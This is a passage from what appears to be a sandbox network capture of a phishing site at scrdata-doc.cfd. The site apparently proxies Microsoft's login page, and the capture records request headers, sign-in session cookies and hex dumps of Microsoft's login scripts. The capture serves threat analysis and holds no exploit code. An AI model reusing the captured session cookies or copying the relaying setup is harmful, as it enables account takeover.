R2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA
2024-04-26 11:21:17 UTC	947	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Length: 20314 Content-Type: text/css Content-Encoding: gzip Content-MD5: kqhA3D0Xczna4D/t8ioitQ== Last-Modified: Wed, 27 Dec 2023 18:18:12 GMT ETag: 0x8DC07082FBB8D2B X-Cache: TCP_HIT x-ms-request-id: b064ee30-e01e-0054-2ad0-8f2aa5000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * X-Azure-Ref-OriginShield: 0hikeZgAAAADFMNY6rdWHSZk+RLV3+0yfQU1TMDRFREdFMTkwNwAzOWExMmY3ZS04OTlmLTQ2Y2YtYTZkMC0yNGJiYmEyN2Q5NTY= X-Azure-Ref: 0LI4rZgAAAAATTxYnXzqmT441hYWVrq60TE9OMjEyMDUwNzEyMDE5ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng== Date: Fri, 26 Apr 2024 11:21:16 GMT Connection: close
2024-04-26 11:21:17 UTC	15437	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 73 e3 36 b2 e8 f7 f9 15 5c a7 52 3b ce 4a 8c 48 3d 2d 57 52 3b 99 cc 26 3e 67 5e 35 33 d9 47 a5 52 5b b4 44 59 3c 43 89 ba 24 65 8f 57 47 ff fd e2 8d 06 d0 20 29 8f b3 d9 7b 2b 27 67 13 0b dd 6c 00 dd 8d 06 1a e8 06 be fe ea 0f c1 f3 62 77 5f 66 37 eb 3a 78 fa fc 3c 78 95 2d ca a2 2a 56 35 29 2f 77 45 99 d4 59 b1 0d 83 67 79 1e 30 a4 2a 28 d3 2a 2d 6f d3 65 18 7c f5 f5 d7 5f fd e1 49 bf fb ff 05 ef 3f 3c 7b f7 21 78 f3 97 e0 c3 8f 57 ef be 0f de 92 5f ff 08 5e bf f9 70 f5 fc 45 d0 99 ca 93 27 1f d6 59 15 ac b2 3c 0d c8 7f af 93 2a 5d 06 c5 36 28 ca 20 db 2e 44 ab d3 2a d8 90 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 f4 21 cf aa 9a 7c 74 9d e6 c5 5d f0 94 90 2b 97 c1 db a4 ac ef 83 ab b7 e7 61 f0 81 e0 16 Data Ascii: }ks6\R;JH=-WR;&>g^53GR[DY<C$eWG ){+'glbw_f7:x<x-V5)/wEYgy0(-oe\|_I?<{!xW_^pE'Y<]6( .D*Y:ve?!\|t]+a
2024-04-26 11:21:17 UTC	4877	IN	Data Raw: a4 ca 54 27 bf 78 75 3a 94 57 d0 ad 28 bc fb 9d d0 a4 f0 1b 91 85 1a 34 e2 08 85 68 c4 91 aa d1 88 a4 95 a4 11 4d aa 4b 23 12 53 9c 16 0c aa 42 cd 28 ed dc 64 6a d5 88 c1 15 cc 41 91 aa e6 00 b8 d2 d9 c5 78 86 9c 2f 65 c9 bc da d5 d8 ba 1d b0 eb fc 7b 22 3d 14 34 f4 8f bc e8 8f c6 9c f9 47 9e cd 6a 15 96 69 95 92 32 78 cd e7 10 64 b3 e0 17 da f1 8b d3 5b 52 0d e1 13 49 03 7b 8b 83 df e9 ce 9f 23 10 77 fa ea eb 7d 79 eb 11 ab 2d f3 75 b1 d9 44 a4 ea 22 20 d6 45 09 41 36 3d ae 63 fa 4f 4b 7f 86 e7 bc b1 e2 92 61 7d df b0 68 ac ab 2c aa b1 88 da cb c6 22 89 f4 a2 b1 42 53 1e da 58 e7 55 1e b5 fb a5 96 31 c6 85 9c 5c 95 58 0f 77 34 04 a7 bc ef e9 bc 62 55 e4 cb 9d 46 11 60 f2 34 8a 20 ba 0a e1 1d 2d b3 ba 41 d4 6a 33 50 25 58 6c a8 15 02 68 eb 56 83 ba b5 a0 Data Ascii: T'xu:W(4hMK#SB(djAx/e{"=4Gji2xd[RI{#w}y-uD" EA6=cOKa}h,"BSXU1\Xw4bUF`4 -Aj3P%XlhV

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:16 UTC	2732	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.js HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA
2024-04-26 11:21:17 UTC	139	IN	HTTP/1.1 200 OK Content-Length: 689017 Content-Type: application/x-javascript Date: Fri, 26 Apr 2024 11:21:17 GMT Connection: close
2024-04-26 11:21:17 UTC	16245	IN	Data Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
2024-04-26 11:21:17 UTC	16384	IN	Data Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31 Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
2024-04-26 11:21:19 UTC	16384	IN	Data Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20 Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
2024-04-26 11:21:19 UTC	16384	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43 Data Ascii: n \|\| "" === n \|\| (n = document.location.search); var t = P.parse(n); t.query = t.query \|\| {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
2024-04-26 11:21:20 UTC	16384	IN	Data Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
2024-04-26 11:21:20 UTC	16384	IN	Data Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28 Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
2024-04-26 11:21:21 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
2024-04-26 11:21:21 UTC	16384	IN	Data Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
2024-04-26 11:21:22 UTC	16384	IN	Data Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
2024-04-26 11:21:22 UTC	16384	IN	Data Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67 Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:16 UTC	2751	OUT	GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_l2bvdjfwt697xziuhxpwsg2.js HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; 